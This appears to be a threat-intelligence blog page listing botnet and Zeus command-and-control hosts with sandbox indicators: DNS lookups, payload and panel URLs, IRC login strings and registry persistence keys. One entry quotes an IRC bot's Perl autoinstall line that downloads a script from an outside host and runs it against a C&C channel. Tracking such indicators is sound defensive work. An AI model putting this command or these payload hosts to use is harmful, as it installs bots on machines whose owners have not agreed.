Category: Uncategorized

213.155.20.163(Kbot HTTP bot hosted with Ukraine Tehnologii Budushego Llc)

Uncategorized

Panel here : http://213.155.20.163/new/auth.php DNS Lookup Host Name IP Address 213.155.20.163 213.155.20.163 Data posted to URLs http://213.155.20.163/new/stat.php (213.155.20.163) http://213.155.20.163/new/stat.php (213.155.20.163) Outgoing connection to remote server: 213.155.20.163 TCP port 80 Outgoing connection to remote server: 213.155.20.163 TCP port 80 Registry Changes by all processes Create or Open Changes HKEY_LOCAL_MACHINESYSTEMControlSet001Servicesmsupdate “ImagePath” = c:windowssystem32mssrv32.exe HKEY_LOCAL_MACHINESYSTEMControlSet001Servicesmsupdate “DisplayName” = MicrosoftRead more...

irc.si.leet.la(linux bots hosted with Canada Iweb Dedicated Cl)

Uncategorized

###################### my $server = “irc.si.leet.la”,”67.205.85.206″; my $port = “7000”; my $channel = “#mojok”; my $owner = “KaKuNg”; my $procname = “usr/sbin/php”; ###################### autoinstall script: ################################################################ #!/usr/bin/perl # # Auto install script by SuWunk # # created: Oktober 2010 # ################################################################ { system(“wget http://tmp.ishaan.eu/home/e107_themes/vekna_bluez/ts.txt;lwp-download http://tmp.ishaan.eu/home/e107_themes/vekna_bluez/ts.txt;curl -O http://tmp.ishaan.eu/home/e107_themes/vekna_bluez/ts.txt;fetch http://tmp.ishaan.eu/home/e107_themes/vekna_bluez/ts.txt;ftp http://tmp.ishaan.eu/home/e107_themes/vekna_bluez/ts.txt;perl ts.txt irc.si.leet.la 7000 mojok KaKuNg;rm -rf *.txt”);Read more...

irc.123empe123.co.cc(botnet hosted with United States Missoula Sharktech Internet Services)

Uncategorized

– DNS Queries: Name Query Type Query Result Successful Protocol irc.123empe123.co.cc DNS_TYPE_A 64.32.29.221 YES udp 64.32.29.221:6667 Nick: [AUT|00|P|90924] Username: XP-0641 Server Pass: pass Joined Channel: ##Galactic## with Password Anti-GaYs Channel Topic for Channel ##Galactic##: “http://www.windowscenter.net/descargas/msn.exe” Now talking in ##Galactic## Topic On: [ ##Galactic## ] [ http://www.windowscenter.net/descargas/msn.exe ] Topic By: [ RooTED[ON] ] Modes On: [Read more...

all4corp.com(Zeus hosted with United States New York Bluemile Inc)

Uncategorized

DNS Lookup Host Name IP Address all4corp.com all4corp.com 76.10.214.62 www.google.com www.google.com 74.125.39.99 Opened listening TCP connection on port: 29790Download URLs http://76.10.214.62/xed/config.bin (all4corp.com) http://74.125.39.99/webhp (www.google.com) http://76.10.214.62/xed/yourbot.exe (all4corp.com) http://76.10.214.62/xed/yourbot.exe (all4corp.com) http://76.10.214.62/xed/yourbot.exe (all4corp.com) Data posted to URLs http://76.10.214.62/xed/gate.php (all4corp.com) Outgoing connection to remote server: all4corp.com TCP port 80 Outgoing connection to remote server: www.google.com TCP port 80 OutgoingRead more...

get.whitesmoke.com(Trojan Downloader hosted with United States Sunnyvale Qwest Communications Company Llc)

Uncategorized

DNS Lookup Host Name IP Address get.whitesmoke.com get.whitesmoke.com 63.236.35.30 c0004553.cdn2.cloudfiles.rackspacecloud.com c0004553.cdn2.cloudfiles.rackspacecloud.com 87.248.217.253 Download URLs http://63.236.35.30/offerbox/OfferBoxSetup_FR.exe (get.whitesmoke.com) http://63.236.35.30/WriterTools/WhiteSmokeWriter.exe (get.whitesmoke.com) http://87.248.217.253/WhiteSmokeWriter.exe (c0004553.cdn2.cloudfiles.rackspacecloud.com) Outgoing connection to remote server: get.whitesmoke.com TCP port 80 Outgoing connection to remote server: c0004553.cdn2.cloudfiles.rackspacecloud.com TCP port 80DNS Lookup Host Name IP Address download.bandoo.com download.bandoo.com 207.232.22.25 download.cdn.bandoo.com download.cdn.bandoo.com 212.201.100.171 Download URLs http://207.232.22.25/o/0/r/63/Fun4IMV6.exe (download.bandoo.com) http://212.201.100.171/cdn/o/0/r/63/Fun4IMV6.exe (download.cdn.bandoo.com)Read more...

205.234.223.186(botnet hosted with United States Chicago Hostforweb Inc)

Uncategorized

Remote Host Port Number 205.234.223.186 1234 PASS xxx 216.178.38.224 80 216.178.39.11 80 64.208.241.27 80 69.63.189.39 80 NICK NEW-[USA|00|P|16686] USER XP-2777 * 0 :COMPUTERNAME MODE NEW-[USA|00|P|16686] -ix JOIN #!nn! test PONG 22 MOTD * The data identified by the following URLs was then requested from the remote web server: o http://browseusers.myspace.com/Browse/Browse.aspx o http://www.myspace.com/browse/people o http://www.myspace.com/help/browserunsupported oRead more...

unknown.hostforweb.net(botnet hosted with United States Chicago Hostforweb Inc)

Uncategorized

Remote Host Port Number 216.178.38.224 80 63.135.80.46 80 96.17.164.187 80 216.246.77.76 2345 PASS xxx NICK NEW-[USA|00|P|20068] USER XP-7334 * 0 :COMPUTERNAME MODE NEW-[USA|00|P|20068] -ix JOIN #!gf! test PONG 22 MOTD * The data identified by the following URLs was then requested from the remote web server: o http://browseusers.myspace.com/Browse/Browse.aspx o http://www.myspace.com/browse/people o http://www.myspace.com/help/browserunsupported o http://x.myspacecdn.com/modules/splash/static/img/cornersSheet.png oRead more...

213.155.29.56(botnet hosted with hosting.ua)

Uncategorized

Remote Host Port Number 213.155.29.56 6667 PASS (SelamS234) NICK {NEW}[USA][XP-SP2]981503 USER 7657 “” “lol” :7657 JOIN #1111 Registry Modifications * The newly created Registry Values are: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] + Windows Firewall = “%Temp%lsass.exe” so that lsass.exe runs every time Windows starts o [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun] + Windows Firewall = “%Temp%lsass.exe” so that lsass.exe runs every time WindowsRead more...

server2.net2streams.com(botnet hosted with United States Miami Fdcservers.net)

Uncategorized

Remote Host Port Number 112.78.112.208 80 218.85.133.201 80 76.73.99.66 6682 PASS laorosr MODE #! -ix MODE #Ma -ix USER SP2-866 * 0 :COMPUTERNAME MODE [N00_USA_XP_6447899] @ -ix MODE #dpi -ix Other details * The following ports were open in the system: Port Protocol Process 1052 TCP cwdrive32.exe (%Windir%cwdrive32.exe) 1054 TCP cwdrive32.exe (%Windir%cwdrive32.exe) 2058 TCP cwdrive32.exeRead more...